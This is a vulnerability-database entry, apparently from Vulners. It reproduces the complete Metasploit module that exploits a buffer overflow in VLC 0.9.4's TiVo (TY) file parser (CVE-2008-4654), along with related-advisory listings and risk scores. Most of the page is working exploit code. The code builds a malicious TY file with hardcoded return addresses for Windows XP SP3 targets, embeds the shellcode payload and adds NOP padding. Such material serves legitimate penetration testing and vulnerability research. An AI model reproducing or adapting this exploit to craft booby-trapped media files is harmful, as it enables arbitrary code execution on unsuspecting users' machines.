Lucene search
K

VideoLAN VLC TiVo Buffer Overflow

🗓️ 03 Dec 2008 01:23:27Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 25 Views

VideoLAN VLC TiVo Buffer Overflow module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-4654
21 Oct 200800:00
circl
Check Point Advisories
VideoLAN VLC Media Player TY Processing Buffer Overflow (CVE-2008-4654)
1 Oct 200900:00
checkpoint_advisories
CVE
CVE-2008-4654
21 Oct 200822:00
cve
Cvelist
CVE-2008-4654
21 Oct 200822:00
cvelist
Debian CVE
CVE-2008-4654
21 Oct 200822:00
debiancve
Exploit DB
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
2 Feb 201100:00
exploitdb
NVD
CVE-2008-4654
22 Oct 200800:11
nvd
OpenVAS
VLC Media Player TY Processing Buffer Overflow Vulnerability - Windows
22 Oct 200800:00
openvas
OpenVAS
VLC Media Player TY Processing BOF Vulnerability - Linux
22 Oct 200800:00
openvas
OpenVAS
VLC Media Player TY Processing Buffer Overflow Vulnerability (Windows)
22 Oct 200800:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VideoLAN VLC TiVo Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
        By creating a malicious TY file, a remote attacker could overflow a
        buffer and execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'MC',
      'References'     =>
        [
          [ 'CVE', '2008-4654' ],
          [ 'OSVDB', '49181' ],
          [ 'BID', '31813' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 550,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # From /misc/ version
          #[ 'VideoLAN VLC 0.9.4', { 'Ret' => 0x6a5e6710 } ],
          #[ 'VideoLAN VLC 0.9.2', { 'Ret' => 0x6a5e69d7 } ],
          [ 'VideoLAN VLC 0.9.4 (XP SP3 English)', { 'Ret' => 0x6a575cad } ],
          [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-10-22',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ty']),
      ])
  end

  def exploit

    ty =  "\xF5\x46\x7A\xBD"
    ty << "\x00\x00\x00\x02"
    ty << "\x00\x02\x00\x00"
    ty << "\x00" * 8
    ty << "\x00\x00\x05\x41"
    ty << "\x00" * 4
    ty << "\x00\x00\x05\x49"
    ty << "\x00" * 60
    # From /misc/ version
    #ty << "\x00" * (1024 - payload.encoded.length) + payload.encoded
    #ty << make_nops(2) + Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')
    #ty << make_nops(12) + [0xe8, -525].pack('CV') + "\x00" * (129931)
    ty << [target.ret].pack('V') + payload.encoded + make_nops(12)
    ty << "\x00" * (130980 - 4 - payload.encoded.length - 12)
    ty << "\x05"
    ty << "\x00" * 3
    ty << "\x05"
    ty << "\x00" * 1
    ty << "\x09"
    ty << "\xc0"
    ty << "\x00" * 14
    ty << "\x06"
    ty << "\xe0"
    ty << "\x00" * 302004

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(ty)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9
CVSS 29.3
EPSS0.57547
25